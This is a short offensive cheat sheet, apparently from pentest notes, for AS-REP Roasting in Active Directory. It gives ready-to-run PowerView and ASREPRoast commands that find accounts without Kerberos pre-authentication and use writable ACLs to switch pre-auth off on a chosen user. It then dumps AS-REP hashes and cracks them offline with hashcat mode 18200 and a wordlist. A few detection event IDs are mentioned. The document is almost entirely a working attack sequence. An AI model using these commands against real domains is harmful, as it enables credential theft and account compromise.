🟢AS-REP Roasting
Load PowerView (dev branch):
. .\PowerView_dev.ps1
Enumerate accounts with Kerberos pre-authentication disabled (DONT_REQ_PREAUTH set in userAccountControl):
Get-DomainUser -PreauthNotRequired -Verbose
Get-DomainUser -PreauthNotRequired -Verbose | select samaccountname
Enumerate the ACLs a group you control holds over other objects. GenericAll, GenericWrite or WriteProperty on a user object is enough to change its userAccountControl:
Invoke-ACLScanner -ResolveGUIDs | Where-Object {$_.IdentityReference -match "<groupname>"}
Invoke-ACLScanner -ResolveGUIDs | Where-Object {$_.IdentityReference -match "<groupname>"} | select IdentityReference, ObjectDN, ActiveDirectoryRights | fl
Set "pre-auth not required" on a user you have write access to. 4194304 is 0x400000, the DONT_REQ_PREAUTH bit. -XOR toggles the bit rather than setting it, so running the command twice re-enables pre-auth; the write is logged on the DC as Event ID 4738 (A user account was changed):
Set-DomainObject -Identity <username> -XOR @{useraccountcontrol=4194304} -Verbose
Request the encrypted AS-REP for one user. No password is needed: with pre-auth off, the KDC hands out a TGT reply encrypted with the user's key to anyone who asks (Event ID 4768 with Pre-Authentication Type 0):
. .\ASREPRoast.ps1
Get-ASREPHash -UserName <username> -Verbose
Enumerate all users with pre-auth disabled and request a hash for each:
Invoke-ASREPRoast -Verbose
Invoke-ASREPRoast -Verbose | fl
Crack the hash offline with hashcat. Mode 18200 is Kerberos 5 AS-REP, etype 23 (RC4-HMAC); the hash line starts with $krb5asrep$23$:
hashcat -a 0 -m 18200 hash.txt rockyou.txt